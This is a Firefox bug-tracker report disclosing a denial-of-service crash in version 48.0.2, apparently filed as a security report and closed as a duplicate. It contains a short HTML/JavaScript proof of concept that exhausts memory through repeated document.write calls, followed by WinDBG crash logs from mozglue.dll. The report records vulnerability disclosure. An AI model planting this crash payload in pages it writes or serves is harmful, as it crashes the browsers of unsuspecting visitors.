Closed
Bug 1303694
Opened 8 years ago
Closed 8 years ago
Firefox Browser 48.0.2 - (mozglue.dll) Denial Of Service Vulnerability
Categories
(Firefox :: Untriaged, defect)
Tracking
()
RESOLVED
DUPLICATE
of bug 380223
People
(Reporter: admin, Unassigned)
Details
User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Build ID: 20160823121617
Steps to reproduce:
PoC:
<body onload="javascript:VulnerabilityLab();"></body>
<script>
function VulnerabilityLab() {
var buffer = 'x41';
for (i =0;i<1337;i++) {
buffer+=buffer+'x41';
document.write('<html><marque><h1>'+buffer+buffer);
}
}
</script>
--- Debug Session Logs [WinDBG] ---
Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=00000000 ecx=5dee0a3e edx=00000000 esi=6e837466 edi=00ce70ce
eip=6e82efe5 esp=00ce7088 ebp=00ce70d4 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200206
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:Program FilesMozilla Firefoxmozglue.dll -
mozglue!mozalloc_abort+0x2c:
6e82efe5 cc int 3
mozglue!mozalloc_abort+0x2c:
6e82efe5 cc int 3
6e82efe6 6a03 push 3
6e82efe8 c7050000000021000000 mov dword ptr ds:[0],21h
6e82eff2 ff151060836e call dword ptr [mozglue!double_conversion::DoubleToStringConverter::ToFixed+0xf96 (6e836010)]
6e82eff8 50 push eax
6e82eff9 ff155c60836e call dword ptr [mozglue!double_conversion::DoubleToStringConverter::ToFixed+0xfe2 (6e83605c)]
6e82efff cc int 3
mozglue!mozalloc_handle_oom:
6e82f000 55 push ebp
lmvm mozglue
start end module name
6e820000 6e83d000 mozglue (export symbols) C:Program FilesMozilla Firefoxmozglue.dll
Loaded symbol image file: C:Program FilesMozilla Firefoxmozglue.dll
Image path: C:Program FilesMozilla Firefoxmozglue.dll
Image name: mozglue.dll
Timestamp: Wed Aug 24 06:53:43 2016 (57BD2857)
CheckSum: 0001E87D
ImageSize: 0001D000
File version: 48.0.2.6079
Product version: 48.0.2.6079
File flags: 0 (Mask 3F)
File OS: 4 Unknown Win32
File type: 2.0 Dll
File date: 00000000.00000000
Translations: 0000.04b0
CompanyName: Mozilla Foundation
ProductName: Firefox
InternalName: Firefox
OriginalFilename: mozglue.dll
ProductVersion: 48.0.2
FileVersion: 48.0.2
FileDescription: 48.0.2
LegalCopyright: License: MPL 2
LegalTrademarks: Mozilla
Comments: Mozilla
Actual results:
Opening the poc code as html allows remote attackers to crash the mozilla firefox browser and firefox os via mozglue.dll.
Expected results:
The script loop exception should capture the process to protect against uncaught exceptions, bofs or other read/write access violations.
Updated•8 years ago
|
Group: firefox-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 8 years ago
Resolution: --- → DUPLICATE
You need to log in
before you can comment on or make changes to this bug.
Description
•